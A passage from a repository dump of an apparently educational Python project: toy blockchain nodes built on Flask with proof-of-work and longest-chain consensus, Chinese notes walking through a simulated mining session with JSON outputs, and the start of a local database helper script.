requests.get(f'http://{node}/chain') 160 | 161 | # 对于节点池nodes中可用的节点 162 | if response.status_code == 200: 163 | length = response.json()['length'] 164 | chain = response.json()['chain'] 165 | 166 | # Check if the length of the chain is longer and the chain is valid 167 | if length > max_length and self.valid_chain(chain): 168 | max_length = length 169 | new_chain = chain 170 | 171 | # Replace our chain if we discovered a new, valid chain longer than ours 172 | if new_chain: 173 | self.chain = new_chain 174 | return True 175 | 176 | return False 177 | 178 | 179 | # ---------------------------------------------------------------------------------- 180 | 181 | 182 | # Instantiate our node 创建节点 183 | app = Flask(__name__) 184 | 185 | # Generate a globally unique address for this node 186 | node_identifier = str(uuid4()).replace('-', '') 187 | 188 | # Instantiate our node 189 | blockChain = blockChain() 190 | 191 | # 创建/transactions/new POST接口,可以给接口发送交易数据. 创建一个交易并添加到区块 192 | @app.route("/transactions/new", methods = ["POST"]) 193 | def new_transaction(): 194 | # values = request.get_json() # 无交易数据返回 195 | 196 | # test 设置静态交易返回数据 197 | values = { 198 | 'sender': '123', 199 | 'recipient': '456', 200 | 'amount': 5 201 | } 202 | 203 | # 检查必填字段是否在POST中 204 | required = ['sender', 'recipient', 'amount'] 205 | if not all(k in values for k in required): 206 | return "Missing values", 400 207 | 208 | # 新建一笔交易 209 | index = blockChain.new_transaction(values['sender'], values['recipient'], values['amount']) 210 | 211 | response = {'message': f'Transaction will be added to block {index}'} 212 | return jsonify(response), 201 213 | 214 | 215 | # 创建/chain接口,返回整个区块链 216 | @app.route("/chain", methods = ["GET"]) 217 | def full_chain(): 218 | response = { 219 | 'chain': blockChain.chain, 220 | 'length': len(blockChain.chain) 221 | } 222 | return jsonify(response), 200 223 | 224 | 225 | # 创建/mine GET接口. 
告诉服务器去挖掘新的区块 226 | @app.route('/mine', methods = ['GET']) 227 | def mine(): 228 | ## 1. 运行工作证明算法以获得下一个证明,即计算工作量证明PoW。验证区块是否合格 229 | last_block = blockChain.last_block 230 | last_proof = last_block['proof'] 231 | proof = blockChain.proof_of_work(last_proof) 232 | 233 | ## 2. 系统给拥有工作量证明的节点提供奖励, 即挖到合格的区块,授予矿工比特币奖励 234 | # 发送者为"0"表明是新挖出的币 235 | blockChain.new_transaction( 236 | sender="0", 237 | recipient=node_identifier, 238 | amount=1, 239 | ) 240 | 241 | ## 3. 构造新区块并将其添加到区块链中 242 | block = blockChain.new_block(proof, None) 243 | response = { 244 | 'message': "New block forged", 245 | 'index': block['index'], 246 | 'transactions': block['transactions'], 247 | 'proof': block['proof'], 248 | 'previous_hash': block['previous_hash'], 249 | } 250 | return jsonify(response), 200 251 | 252 | 253 | # 添加路由/nodes/register POST接口,注册节点 254 | @app.route('/nodes/register', methods = ['POST']) 255 | def register_nodes(): 256 | print("begin register...") 257 | # values = request.get_json() 258 | # nodes = values.get('nodes') 259 | 260 | # test 设置假定的端口号为5001、5002 261 | nodes = ['http://192.168.2.111:5001', 262 | 'http://192.168.2.111:5000'] 263 | 264 | if nodes is None: 265 | return "Error: Please supply a valid list of nodes", 400 266 | 267 | for node in nodes: 268 | blockChain.register_node(node) 269 | 270 | response = { 271 | 'message': 'New nodes have been added', 272 | 'total_nodes': list(blockChain.nodes) 273 | } 274 | return jsonify(response), 201 275 | 276 | 277 | # 添加路由/nodes/resolve GET接口,解决冲突 278 | @app.route('/nodes/resolve', methods = ['GET']) 279 | def consensus(): 280 | print("begin resolve...") 281 | replaced = blockChain.resolve_conflicts() 282 | 283 | if replaced: 284 | response = { 285 | 'message': 'Our chain was replaced', 286 | 'new_chain': blockChain.chain, 287 | 'length': len(blockChain.chain) 288 | } 289 | else: 290 | response = { 291 | 'message': 'Our chain is authoritative', 292 | 'chain': blockChain.chain, 293 | 'length': len(blockChain.chain) 294 | } 295 | 
296 | return jsonify(response), 200 297 | 298 | 299 | if __name__ == "__main__": 300 | parser = ArgumentParser() 301 | parser.add_argument('-p', '--port', default=5000, type=int, help='port to listen on') 302 | args = parser.parse_args() 303 | port = args.port 304 | 305 | # 服务运行在端口5000上 306 | app.run(host='192.168.2.111', port=5000) 307 | -------------------------------------------------------------------------------- /blockchains/blockchain_node2.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 模拟区块链结点2 6 | -------------------------------------- 7 | @File : blockchain_node1.py 8 | @Time : 2018/4/24 16:51 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import hashlib 17 | import json 18 | from time import time 19 | from urllib import parse 20 | from typing import Any, Dict, List, Optional 21 | from urllib.parse import urlparse 22 | from uuid import uuid4 23 | from flask import Flask, jsonify, request 24 | import requests 25 | from argparse import ArgumentParser 26 | 27 | # blockChain类用来管理链条,负责存储交易、加入新块等 28 | class blockChain(object): 29 | def __init__(self): 30 | self.chain = [] # 用于存储区块链 31 | self.current_transactions = [] # 用于存储交易记录 32 | self.nodes = set() # 用set来存储节点,避免重复添加节点(利用set的属性) 33 | 34 | # Create the genesis block 创建创世区块 35 | self.new_block(previous_hash = '1', proof = 100) 36 | 37 | 38 | # Creates a new block and adds it to the chain 生成新块并添加到区块链中 39 | # param proof: The proof given by the proof of work algorithm 40 | # param previous_hash: (Optional 可选) Hash of previous block 41 | # return: New block 42 | def new_block(self, proof, previous_hash: Optional[str]) -> Dict[str, Any]: 43 | # block 44 | block = { 45 | 'index': len(self.chain) + 1, 46 | 'timestamp': 
time(), 47 | 'transactions': self.current_transactions, 48 | 'proof': proof, 49 | 'previous_hash': previous_hash or self.hash(self.chain[-1]), 50 | } 51 | 52 | # Reset the current list of transactions 将交易加入到区块后重置交易记录。目的:在新的区块中打包记录新的交易情况,不能含有之前的交易记录 53 | self.current_transactions = [] 54 | 55 | # Add the new block to the list of chain 56 | self.chain.append(block) 57 | 58 | return block 59 | 60 | 61 | # Adds a new transaction to the list of transactions 62 | # 生成新的交易记录添加到交易列表中,新的交易记录将加入到下一个待挖的区块中,并返回该交易记录将被添加到的下一个待挖区块的索引 63 | # param sender: Address of the sender 发送者地址 64 | # param recipient: Address of the recipient 接收者地址 65 | # param amount: Amount 发送比特币的数量 66 | # return: The index of the block that will hold this transaction 67 | def new_transaction(self, sender: str, recipient: str, amount: int) -> int: 68 | self.current_transactions.append({ 69 | "sender": sender, 70 | "recipient": recipient, 71 | "amount": amount 72 | }) 73 | return self.last_block['index'] + 1 74 | 75 | 76 | # Hashes a block 生成块的SHA-256 hash值 77 | # param block: block 78 | # return: Hash 79 | @staticmethod # 静态方法 80 | def hash(block: Dict[str, Any]) -> str: 81 | block_string = json.dumps(block, sort_keys=True).encode() # 序列化列表为json字符串格式 82 | return hashlib.sha256(block_string).hexdigest() # hash.hexdigest()生成十六进制数据字符串值 83 | 84 | 85 | # Returns the last block in the chain 86 | @property # 将一个方法变成属性调用 87 | def last_block(self) -> Dict[str, Any]: 88 | return self.chain[-1] 89 | 90 | 91 | # 简单工作量证明: 寻找一个数p,使得它与前一个区块的工作量证明值(proof)拼接成的字符串的 Hash 值(hash(last_proof, proof))以 4 个零开头。 92 | # param last_proof: 前一个区块的工作量证明值 93 | # return: proof 算力,工作量证明 94 | def proof_of_work(self, last_proof: int) -> int: 95 | proof = 0 96 | while self.valid_proof(last_proof, proof) is False: 97 | proof += 1 98 | return proof 99 | 100 | 101 | # 验证证明: hash(last_proof, proof)是否以四个零开头? 
102 | # param last_proof: Previous proof 前一个区块的工作量证明值 103 | # param proof: Current Proof 当前区块的工作量证明值 104 | # return: True is current, false if not 105 | @staticmethod 106 | def valid_proof(last_proof: int, proof: int) -> bool: 107 | guess = f'{last_proof}{proof}'.encode() 108 | guess_hash = hashlib.sha256(guess).hexdigest() 109 | return guess_hash[:4] == "0000" 110 | 111 | 112 | # 一致性(共识):注册节点,在多个节点中添加一个新的节点 113 | # param address: Address of node. Eg. 'http://192.168.0.5:5000' 114 | # return: None 115 | def register_node(self, address): 116 | parsed_url = urlparse(address) 117 | self.nodes.add(parsed_url.netloc) # 添加节点的地址和端口号,根据urlparse解析结果 118 | 119 | 120 | # Determine if a given blockchain is valid 检查是否是有效链,遍历每个块验证hash和proof 121 | # param chain: A blockchain 区块链列表 122 | # return: True if valid, false if not 123 | def valid_chain(self, chain: List[Dict[str, Any]]) -> bool: 124 | last_block = chain[0] 125 | current_index = 1 126 | 127 | while current_index < len(chain): 128 | block = chain[current_index] 129 | print(f'{last_block}') 130 | print(f'{block}') 131 | print("\n------------------\n") 132 | 133 | # Check that the hash of the block is correct 检测当前块是否正确可用。依据:当前块的previous_hash值是否等于前一个块的hash值 134 | if block['previous_hash'] != self.hash(last_block): 135 | return False 136 | 137 | # Check that the proof of work is correct 检测工作量证明是否正确 138 | if not self.valid_proof(last_block['proof'], block['proof']): 139 | return False 140 | 141 | last_block = block 142 | current_index += 1 143 | 144 | return True 145 | 146 | 147 | # 共识算发解决冲突,使用网络中最长的链 148 | # return: 如果链被取代返回True,否则返回False 149 | def resolve_conflicts(self) -> bool: 150 | # 获取所有临近节点,nodes包含网络中的所有节点内容 151 | neighbours = self.nodes 152 | new_chain = None 153 | 154 | # We're only looking for chains longer than ours 155 | max_length = len(self.chain) 156 | 157 | # Grab and verify the chains from all the nodes in our network 158 | # 遍历所有邻居节点,并验证链的有效性,如果发现有效更长链,则替换掉自己的链 159 | for node in neighbours: 160 | response = 
requests.get(f'http://{node}/chain') 161 | 162 | # 对于节点池nodes中可用的节点 163 | if response.status_code == 200: 164 | length = response.json()['length'] 165 | chain = response.json()['chain'] 166 | 167 | # Check if the length of the chain is longer and the chain is valid 168 | if length > max_length and self.valid_chain(chain): 169 | max_length = length 170 | new_chain = chain 171 | 172 | # Replace our chain if we discovered a new, valid chain longer than ours 173 | if new_chain: 174 | self.chain = new_chain 175 | return True 176 | 177 | return False 178 | 179 | 180 | # ---------------------------------------------------------------------------------- 181 | 182 | 183 | # Instantiate our node 创建节点 184 | app = Flask(__name__) 185 | 186 | # Generate a globally unique address for this node 187 | node_identifier = str(uuid4()).replace('-', '') 188 | 189 | # Instantiate our node 190 | blockChain = blockChain() 191 | 192 | # 创建/transactions/new POST接口,可以给接口发送交易数据. 创建一个交易并添加到区块 193 | @app.route("/transactions/new", methods = ["POST"]) 194 | def new_transaction(): 195 | # values = request.get_json() # 无交易数据返回 196 | 197 | # test 设置静态交易返回数据 198 | values = { 199 | 'sender': '123', 200 | 'recipient': '456', 201 | 'amount': 5 202 | } 203 | 204 | # 检查必填字段是否在POST中 205 | required = ['sender', 'recipient', 'amount'] 206 | if not all(k in values for k in required): 207 | return "Missing values", 400 208 | 209 | # 新建一笔交易 210 | index = blockChain.new_transaction(values['sender'], values['recipient'], values['amount']) 211 | 212 | response = {'message': f'Transaction will be added to block {index}'} 213 | return jsonify(response), 201 214 | 215 | 216 | # 创建/chain接口,返回整个区块链 217 | @app.route("/chain", methods = ["GET"]) 218 | def full_chain(): 219 | response = { 220 | 'chain': blockChain.chain, 221 | 'length': len(blockChain.chain) 222 | } 223 | return jsonify(response), 200 224 | 225 | 226 | # 创建/mine GET接口. 
告诉服务器去挖掘新的区块 227 | @app.route('/mine', methods = ['GET']) 228 | def mine(): 229 | ## 1. 运行工作证明算法以获得下一个证明,即计算工作量证明PoW。验证区块是否合格 230 | last_block = blockChain.last_block 231 | last_proof = last_block['proof'] 232 | proof = blockChain.proof_of_work(last_proof) 233 | 234 | ## 2. 系统给拥有工作量证明的节点提供奖励, 即挖到合格的区块,授予矿工比特币奖励 235 | # 发送者为"0"表明是新挖出的币 236 | blockChain.new_transaction( 237 | sender="0", 238 | recipient=node_identifier, 239 | amount=1, 240 | ) 241 | 242 | ## 3. 构造新区块并将其添加到区块链中 243 | block = blockChain.new_block(proof, None) 244 | response = { 245 | 'message': "New block forged", 246 | 'index': block['index'], 247 | 'transactions': block['transactions'], 248 | 'proof': block['proof'], 249 | 'previous_hash': block['previous_hash'], 250 | } 251 | return jsonify(response), 200 252 | 253 | 254 | # 添加路由/nodes/register POST接口,注册节点 255 | @app.route('/nodes/register', methods = ['POST']) 256 | def register_nodes(): 257 | print("begin register...") 258 | # values = request.get_json() 259 | # nodes = values.get('nodes') # 无返回结果 260 | 261 | # test 设置假定的端口号为5021、5022;假定端口号第三位的2对应此文件node2 262 | nodes = ['http://192.168.2.111:5001', 263 | 'http://192.168.2.111:5002', 264 | 'http://192.168.2.111:5003'] 265 | 266 | if nodes is None: 267 | return "Error: Please supply a valid list of nodes", 400 268 | 269 | for node in nodes: 270 | blockChain.register_node(node) 271 | 272 | response = { 273 | 'message': 'New nodes have been added', 274 | 'total_nodes': list(blockChain.nodes) 275 | } 276 | return jsonify(response), 201 277 | 278 | 279 | # 添加路由/nodes/resolve GET接口,解决冲突 280 | @app.route('/nodes/resolve', methods = ['GET']) 281 | def consensus(): 282 | print("begin resolve...") 283 | replaced = blockChain.resolve_conflicts() 284 | 285 | if replaced: 286 | response = { 287 | 'message': 'Our chain was replaced', 288 | 'new_chain': blockChain.chain, 289 | 'length': len(blockChain.chain) 290 | } 291 | else: 292 | response = { 293 | 'message': 'Our chain is authoritative', 294 | 'chain': 
blockChain.chain, 295 | 'length': len(blockChain.chain) 296 | } 297 | 298 | return jsonify(response), 200 299 | 300 | 301 | if __name__ == "__main__": 302 | parser = ArgumentParser() 303 | parser.add_argument('-p', '--port', default=5000, type=int, help='port to listen on') 304 | args = parser.parse_args() 305 | port = args.port 306 | 307 | # 服务运行在端口5002上 308 | app.run(host='192.168.2.111', port=5003) 309 | -------------------------------------------------------------------------------- /blockchains/待解决问题.txt: -------------------------------------------------------------------------------- 1 | 0. 解决已有问题 2 | 问题:request没有内容 3 | 方法:设置静态的返回内容(解决方式暂定) 4 | 5 | 包含技术点: 6 | 1. @staticmethod @property 7 | 2. hash.hexdigest() hash.sha256 8 | 3. json.dumps 9 | 4. uuid4() 10 | 5. flask框架 11 | 12 | set()属性存储节点 13 | 14 | from typing import Any, Dict, List, Optional 15 | new_block(self, proof, previous_hash: Optional[str]) -> Dict[str, Any] 16 | def new_transaction(self, sender: str, recipient: str, amount: int) -> int 17 | 18 | guess = f'{last_proof}{proof}'.encode() f'{}{}' 19 | 20 | urlparse 21 | 22 | jsonify(response) 23 | 24 | 400 201 200 25 | 26 | node_identifier = str(uuid4()).replace('-', '') 27 | -------------------------------------------------------------------------------- /blockchains/模拟挖矿过程.txt: -------------------------------------------------------------------------------- 1 | 2 | 模拟挖矿的整体过程: 3 | 1. 
访问链接 http://192.168.2.111:5000/chain,查看创世区块的主要内容,如下: 4 | 其中,包括创世区块的索引为1,设定的hash、proof,时间戳,为空的交易记录。 5 | { 6 | "chain": [ 7 | { 8 | "index": 1, 9 | "previous_hash": "1", 10 | "proof": 100, 11 | "timestamp": 1524207612.618698, 12 | "transactions": [] 13 | } 14 | ], 15 | "length": 1 16 | } 17 | 18 | 2,访问链接 http://192.168.2.111:5000/mine,查看新建区块的主要内容,如下: 19 | 其中,包括新建区块的索引为2,新加入的区块消息"New block forged",上一个区块的hash值,计算出当前区块的算力(工作量证明)proof=35293, 20 | 交易记录为transactions,由于只是模拟新建区块的情况,没有添加具体的交易内容,只有完成挖矿对矿工的奖励交易信息,即sender=0的交易记录。 21 | { 22 | "index": 2, 23 | "previous_hash": "b3bdbdb4b95b3f7a96b17bf3843af0ac22ebabc993490b594ccf10d82fa90b2e", 24 | "proof": 35293, 25 | "timestamp": 1524207627.0737095, 26 | "transactions": [ 27 | { 28 | "amount": 1, 29 | "recipient": "fc30a002579d4c159538353a9a267d97", 30 | "sender": "0" 31 | } 32 | ] 33 | } 34 | 35 | 3. 再次访问链接 http://192.168.2.111:5000/chain,再次查看区块链的主要内容,结果如下: 36 | 可以看到,此时的区块链已经包含创世区块(index=1)以及刚添加的区块(index=2),区块链的长度"length": 2 37 | { 38 | "chain": [ 39 | { 40 | "index": 1, 41 | "previous_hash": "1", 42 | "proof": 100, 43 | "timestamp": 1524207612.618698, 44 | "transactions": [] 45 | }, 46 | { 47 | "index": 2, 48 | "previous_hash": "b3bdbdb4b95b3f7a96b17bf3843af0ac22ebabc993490b594ccf10d82fa90b2e", 49 | "proof": 35293, 50 | "timestamp": 1524207627.0737095, 51 | "transactions": [ 52 | { 53 | "amount": 1, 54 | "recipient": "fc30a002579d4c159538353a9a267d97", 55 | "sender": "0" 56 | } 57 | ] 58 | } 59 | ], 60 | "length": 2 61 | } 62 | 63 | 4. 访问链接 http://192.168.2.111:5000/transactions/new,即新建交易,结果如下: 64 | { 65 | "message": "Transaction will be added to block 3" 66 | } 67 | 即新建的交易信息会被添加到block 3 的区块中包装。 68 | 69 | 5. 继续访问链接 http://192.168.2.111:5000/transactions/new,再次新建交易,结果如下: 70 | { 71 | "message": "Transaction will be added to block 3" 72 | } 73 | 即新建的不同的交易信息,会被再次添加到block 3 的区块中包装。 74 | 75 | 6. 
访问链接 http://192.168.2.111:5000/mine,将第四步、第五步生成的交易信息添加到区块中,即block 3 中。结果如下: 76 | 其中,包括新建区块的索引为3,新加入的区块消息"New block forged"。上一个区块的hash值,计算出当前区块的算力(工作量证明)proof=35089, 77 | 此时的交易记录中,包含第四步、第五步生成的交易信息,即transactions中的前两个交易记录。 78 | 最后也包含系统对矿工的奖励交易信息,即sender=0交易记录。 79 | { 80 | "index": 3, 81 | "message": "New block forged", 82 | "previous_hash": "cc8e7dfd9c448a401468384a83667669bcd8f654722882cd0106c26de5c96fbe", 83 | "proof": 35089, 84 | "transactions": [ 85 | { 86 | "amount": 5, 87 | "recipient": "456", 88 | "sender": "123" 89 | }, 90 | { 91 | "amount": 5, 92 | "recipient": "456", 93 | "sender": "123" 94 | }, 95 | { 96 | "amount": 1, 97 | "recipient": "fc30a002579d4c159538353a9a267d97", 98 | "sender": "0" 99 | } 100 | ] 101 | } 102 | 103 | 7. 访问链接 http://192.168.2.111:5000/chain,查看此时的区块链的内容,结果如下: 104 | 可以看到,经过创建创世区块(index=1)、添加无交易信息的空区块(index=2)、添加两个交易信息的区块(index=3),整个区块链的长度达到3. 105 | { 106 | "chain": [ 107 | { 108 | "index": 1, 109 | "previous_hash": "1", 110 | "proof": 100, 111 | "timestamp": 1524207612.618698, 112 | "transactions": [] 113 | }, 114 | { 115 | "index": 2, 116 | "previous_hash": "b3bdbdb4b95b3f7a96b17bf3843af0ac22ebabc993490b594ccf10d82fa90b2e", 117 | "proof": 35293, 118 | "timestamp": 1524207627.0737095, 119 | "transactions": [ 120 | { 121 | "amount": 1, 122 | "recipient": "fc30a002579d4c159538353a9a267d97", 123 | "sender": "0" 124 | } 125 | ] 126 | }, 127 | { 128 | "index": 3, 129 | "previous_hash": "cc8e7dfd9c448a401468384a83667669bcd8f654722882cd0106c26de5c96fbe", 130 | "proof": 35089, 131 | "timestamp": 1524207930.704413, 132 | "transactions": [ 133 | { 134 | "amount": 5, 135 | "recipient": "456", 136 | "sender": "123" 137 | }, 138 | { 139 | "amount": 5, 140 | "recipient": "456", 141 | "sender": "123" 142 | }, 143 | { 144 | "amount": 1, 145 | "recipient": "fc30a002579d4c159538353a9a267d97", 146 | "sender": "0" 147 | } 148 | ] 149 | } 150 | ], 151 | "length": 3 152 | } 153 | 154 | # 添加路由解决冲突问题 155 | 8. 
在三个文件(blockchain.py, blockchain_node1.py, blockchain_node2.py)中,设定对应的节点及其端口号。 156 | 在pycharm中,依次运行三个文件,结果如下: 157 | * Running on http://192.168.2.111:5000/ (Press CTRL+C to quit) 158 | * Running on http://192.168.2.111:5001/ (Press CTRL+C to quit) 159 | * Running on http://192.168.2.111:5002/ (Press CTRL+C to quit) 160 | 161 | 9. 在Postman中依次打开三个窗口,模拟三个节点的发送请求。 162 | http://192.168.2.111:5000/chain GET方式; 163 | http://192.168.2.111:5001/chain GET方式; 164 | http://192.168.2.111:5002/chain GET方式; 165 | 166 | 10. 在第一个窗口(5001)中,模拟挖出三个区块,即 http://192.168.2.111:5001/mine GET方式 发送三次请求。 167 | 在访问http://192.168.2.111:5001/chain,得到结果如下: 168 | { 169 | "chain": [ 170 | { 171 | "index": 1, 172 | "previous_hash": "1", 173 | "proof": 100, 174 | "timestamp": 1524636695.0677617, 175 | "transactions": [] 176 | }, 177 | { 178 | "index": 2, 179 | "previous_hash": "413186ba30bc4706a94212b8837afc9a06064eabeb8d999d53f74b0280c9949a", 180 | "proof": 35293, 181 | "timestamp": 1524636713.2794747, 182 | "transactions": [ 183 | { 184 | "amount": 1, 185 | "recipient": "db044e87361d42d6bb36a118da23cc4a", 186 | "sender": "0" 187 | } 188 | ] 189 | }, 190 | { 191 | "index": 3, 192 | "previous_hash": "5adc8d4cef47df9969d0d62a99290e5b0779b57b8c3582031974bf102b422f2c", 193 | "proof": 35089, 194 | "timestamp": 1524636714.5593677, 195 | "transactions": [ 196 | { 197 | "amount": 1, 198 | "recipient": "db044e87361d42d6bb36a118da23cc4a", 199 | "sender": "0" 200 | } 201 | ] 202 | }, 203 | { 204 | "index": 4, 205 | "previous_hash": "3b552f1fbc39f5cd8a8327d41351d0c083211e7943b2f8ef97b6155654912898", 206 | "proof": 119678, 207 | "timestamp": 1524636715.4139643, 208 | "transactions": [ 209 | { 210 | "amount": 1, 211 | "recipient": "db044e87361d42d6bb36a118da23cc4a", 212 | "sender": "0" 213 | } 214 | ] 215 | } 216 | ], 217 | "length": 4 218 | } 219 | 220 | 11. 
在第二个窗口(5002)中,模拟挖出两个区块,即 http://192.168.2.111:5002/mine GET方式 发送两次请求。 221 | 在访问http://192.168.2.111:5002/chain,得到结果如下: 222 | { 223 | "chain": [ 224 | { 225 | "index": 1, 226 | "previous_hash": "1", 227 | "proof": 100, 228 | "timestamp": 1524636760.722611, 229 | "transactions": [] 230 | }, 231 | { 232 | "index": 2, 233 | "previous_hash": "acb63047662a741fda3195fc765b6d2fb5c124e5c4e90172ec9b437a148969bf", 234 | "proof": 35293, 235 | "timestamp": 1524636768.9283345, 236 | "transactions": [ 237 | { 238 | "amount": 1, 239 | "recipient": "6cbb4b7f8738471b9c33b0db0bddf8d8", 240 | "sender": "0" 241 | } 242 | ] 243 | }, 244 | { 245 | "index": 3, 246 | "previous_hash": "d14b77ee468e18f30da685bf7e8caa9ff201b20bd791d6174d7eaba898f59013", 247 | "proof": 35089, 248 | "timestamp": 1524636769.9380262, 249 | "transactions": [ 250 | { 251 | "amount": 1, 252 | "recipient": "6cbb4b7f8738471b9c33b0db0bddf8d8", 253 | "sender": "0" 254 | } 255 | ] 256 | } 257 | ], 258 | "length": 3 259 | } 260 | 261 | 12. 在第三个窗口(5003)中,模拟挖出一个区块,即 http://192.168.2.111:5003/mine GET方式 发送一次请求。 262 | 在访问http://192.168.2.111:5003/chain,得到结果如下: 263 | { 264 | "chain": [ 265 | { 266 | "index": 1, 267 | "previous_hash": "1", 268 | "proof": 100, 269 | "timestamp": 1524636812.4287012, 270 | "transactions": [] 271 | }, 272 | { 273 | "index": 2, 274 | "previous_hash": "257905fe9635c5c301ab08e43a6fb7d35302714d2632ab544731fa68556dac1e", 275 | "proof": 35293, 276 | "timestamp": 1524636819.811855, 277 | "transactions": [ 278 | { 279 | "amount": 1, 280 | "recipient": "5743e8ae7f744261a5d394b67d9b528e", 281 | "sender": "0" 282 | } 283 | ] 284 | } 285 | ], 286 | "length": 2 287 | } 288 | 289 | 13. 
此时,5001端口挖到三个区块,5002端口挖到两个区块,5003端口挖到一个区块。 290 | 即节点5001对应的区块链是最长的链,节点5002对应的区块链次之,节点5003对应的区块链最短。 291 | 将三个节点进行注册,添加到节点nodes = set()中。 292 | 在第一个窗口(5001),访问连接 http://192.168.2.111:5001/nodes/register POST方式,注册当前的节点,结果如下: 293 | { 294 | "message": "New nodes have been added", 295 | "total_nodes": [ 296 | "192.168.2.111:5003", 297 | "192.168.2.111:5002", 298 | "192.168.2.111:5001" 299 | ] 300 | } 301 | 在第二个窗口(5002),访问连接 http://192.168.2.111:5002/nodes/register POST方式,注册当前的节点,结果如下: 302 | { 303 | "message": "New nodes have been added", 304 | "total_nodes": [ 305 | "192.168.2.111:5001", 306 | "192.168.2.111:5002", 307 | "192.168.2.111:5003" 308 | ] 309 | } 310 | 在第三个窗口(5003),访问连接 http://192.168.2.111:5003/nodes/register POST方式,注册当前的节点,结果如下: 311 | { 312 | "message": "New nodes have been added", 313 | "total_nodes": [ 314 | "192.168.2.111:5003", 315 | "192.168.2.111:5001", 316 | "192.168.2.111:5002" 317 | ] 318 | } 319 | 320 | 14. 验证共识算发,用最长的区块链替换短的链,操作如下: 321 | 在第二个窗口(5002),访问连接 http://192.168.2.111:5002/nodes/resolve GET方式,检查当前的节点,结果如下: 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 注: 331 | 1. 在交易的模拟过程中,设定的交易信息静态消息,主要内容为: 332 | { 333 | "amount": 5, 334 | "recipient": "456", 335 | "sender": "123" 336 | } 337 | 包括:交易的数量、发送方、接收方。 338 | 所以在区块链的区块中,交易内容相同。 339 | 在request.get_json()中,无接受数据,此点尚且作为遗留问题。 340 | 341 | 2. 
在模拟挖矿的过程中,前一个区块的工作量证明last_proof,与本区块的工作量证明proof,共同组成的字符串的hash值hash(last_proof proof), 342 | 以其是否以四个零开头,作为是否为合格区块的标志。即valid_proof()函数的作用。 343 | 此处慎重调整开头零的个数,当添加两个零,即判定是否以六个零作为开头时,计算的工作量证明为49259370(四个零开头为35089),工作量提升了1403.84倍。 344 | 345 | -------------------------------------------------------------------------------- /data_process/db_operation.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 数据库相关操作 6 | -------------------------------------- 7 | @File : db_operation.py 8 | @Time : 2018/8/25 12:28 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import re 17 | import traceback 18 | import json 19 | from pymongo import MongoClient 20 | import pymysql 21 | import csv 22 | import cx_Oracle 23 | 24 | class trans(): 25 | def __init__(self): 26 | self.jsonPath = "json2mongo.json" 27 | self.mysqlPath = "csv2mysql.csv" 28 | self.oraclePath = "csv2oracle.csv" 29 | self.mongodb_localhost = "mongodb://localhost:27017" # 修改的host为locaohost,或具体的连接地址(在MongoDB安装目录bin下,输入cmd,输入mongo查看具体的连接信息) 30 | self.mysql_localhost = pymysql.connect( 31 | host = 'localhost', 32 | port = 3306, 33 | user = 'root', 34 | passwd = '123456789', 35 | db = 'demo', 36 | charset = 'utf8' # utf8 not utf-8 37 | ) 38 | self.oracle_localhost = cx_Oracle.connect('scott/123456789@localhost:1521/orcl') # 链接信息:localhost:1521/orcl,在数据库中右键属性,查看链接详细信息 39 | 40 | def json2mongodb(self): 41 | print("begin process json...") 42 | try: 43 | # 1. 连接MongoDB 44 | conn = MongoClient(self.mongodb_localhost) 45 | db = conn.demo # 连接数据库demo,没有自动创建 46 | demo_json = db.demo_json # 使用demo_json集合,没有自动创建 47 | 48 | # 2. 插入数据 49 | # demo_json.insert([{"name":"lxj", "age":"18"}, {"sex":"man"}]) 50 | 51 | # 3. 
查找数据 52 | # one_json = demo_json.find_one({"name":"lxj"}) 53 | 54 | # obj = demo_json.find_one() 55 | # obj_id = obj["_id"] # ObjectId类型,直接根据ObjectId用于定向查找 56 | # print(demo_json.find_one({"_id": obj_id})) 57 | 58 | # 4. 修改数据 59 | # demo_json.update_one({"name":"lxj"}, {"$set":{"age":"20"}}) 60 | 61 | # 5. 遍历数据 62 | # print(db.demo_json.count()) 63 | # for i in demo_json.find(): 64 | # print(i) 65 | 66 | # 6. 删除数据 67 | # db.demo_json.remove() # 全部删除 68 | 69 | # 7. 插入json文件 70 | # with open(self.jsonPath, "r", encoding="utf-8") as f: 71 | # jsonFile = json.load(f) 72 | # demo_json.insert(jsonFile) 73 | except: 74 | traceback.print_exception 75 | 76 | def csv2mysql(self): 77 | print("begin mysql...") 78 | try: 79 | # 1. 连接MySQL 80 | conn = self.mysql_localhost 81 | cursor = conn.cursor() 82 | # findall_sql = "select * from test" 83 | # cursor.execute(findall_sql) 84 | 85 | # 2. 查看数据 86 | # all_row = cursor.fetchall() 87 | # print(all_row) 88 | 89 | # 3. 插入数据 90 | # insert_sql = "insert into test values ('2','zz','7')" 91 | # cursor.execute(insert_sql) 92 | 93 | # 4. 修改数据 94 | # update_sql = "update test set age = '33' where name = 'aaa'" 95 | # cursor.execute(update_sql) 96 | 97 | # 5. 删除数据 98 | # delete_sql = "delete from test where age<10" 99 | # cursor.execute(delete_sql) 100 | 101 | # 6. 
新建表 102 | # header = ['id', '主题', '用户ID', '用户名', '推荐力度', '评论时间', '评论标题', '评论内容'] 103 | # createTable_sqll = """ 104 | # CREATE TABLE IF NOT EXISTS`testtest` ( 105 | # `%s` INT PRIMARY KEY AUTO_INCREMENT NOT NULL, 106 | # `%s` varchar(128) DEFAULT NULL, 107 | # `%s` varchar(128) DEFAULT NULL, 108 | # `%s` varchar(128) DEFAULT NULL, 109 | # `%s` varchar(30) DEFAULT NULL, 110 | # `%s` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, 111 | # `%s` varchar(500) DEFAULT NULL, 112 | # `%s` varchar(65533) DEFAULT NULL 113 | # ) ENGINE=InnoDB DEFAULT CHARSET=utf8; 114 | # """ % (header[0], header[1], header[2], header[3], header[4], header[5], header[6], header[7]) 115 | # cursor.execute(createTable_sqll) 116 | 117 | # 7. 写入csv文件--采用csv方式 118 | # utf-8_sig编码,去掉多余字符BOM(打开utf-8文件时开头的一个多余字符,用来声明编码信息) 119 | with open(self.mysqlPath, "r", 